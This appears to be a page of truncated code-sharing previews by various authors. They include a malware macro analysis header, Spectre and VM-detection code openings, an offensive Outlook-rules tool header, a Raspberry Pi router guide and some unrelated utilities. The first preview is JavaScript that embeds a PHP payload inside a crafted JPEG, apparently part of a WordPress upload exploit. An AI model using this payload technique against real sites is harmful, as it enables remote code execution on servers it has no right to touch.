allyshka

var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

xpn

#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

JohnLaTwC

## uploaded by @JohnLaTwC
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
===============================================================================
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
Type: OLE
-------------------------------------------------------------------------------

jthuraisamy

PyExZ3 Example with HackSysExtremeVulnerableDriver

TL;DR: Using symbolic execution to recover driver IOCTL codes that are computed at runtime.

The goal here is to find valid IOCTL codes for the HackSysExtremeVulnerableDriver by analyzing the binary. The control flow varies between the binary and source due to compiler optimizations. This results in a situation where only a few IOCTL codes in the assembly are represented as a constant with the remaining being computed at runtime.

The code in hevd_ioctl.py is a approximation of the control flow of the compiled IrpDeviceIoCtlHandler function. The effects of the compiler optimization are more pronounced when comparing this code to the original C function. To comply with requirements of the PyExZ3 module, the target function is named after the script's filename, and the `ex

ErikAugust

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

mattifestation

# http://www.bouncycastle.org/csharp/
$BouncyCastlePath = 'Path\To\BouncyCastle.Crypto.dll'

$BouncyCastle = Add-Type -Path $BouncyCastlePath -PassThru

function Get-TrustedRootCertificateHash {
    [OutputType([String])]
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]

Akagi201

使用树莓派3B打造超强路由之一：初装

新款的树莓派3B功能之丰富，性能之强悍，让我垂涎。考虑到家里的网件 WNDR3700v2 也服役四年有余了。还是败了一个树莓派3B回来打造成新的路由。

WARNING 本文所有指令均仅供参考，切勿无脑复制粘贴！

〇 安装系统

mfontanini

// Base code taken from 
// https://github.com/mfontanini/Programs-Scripts/blob/master/constexpr_hashes/md5.h 
// and expanded to include a main function

#ifndef CONSTEXPR_HASH_MD5_H
#define CONSTEXPR_HASH_MD5_H

#include <array>
#include <iostream>
#include <cstdint>

monoxgas

#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security

import os
import sys
import argparse
import re
import binascii
import codecs

c0d3inj3cT

/*
Detect VMWare using OEM String in Memory
Tested on Windows XP SP3/VMWare Workstation 7.1.0
c0d3inj3cT
*/

#include <windows.h>
#include <stdio.h>

#define MARKER "MS_VM_CERT"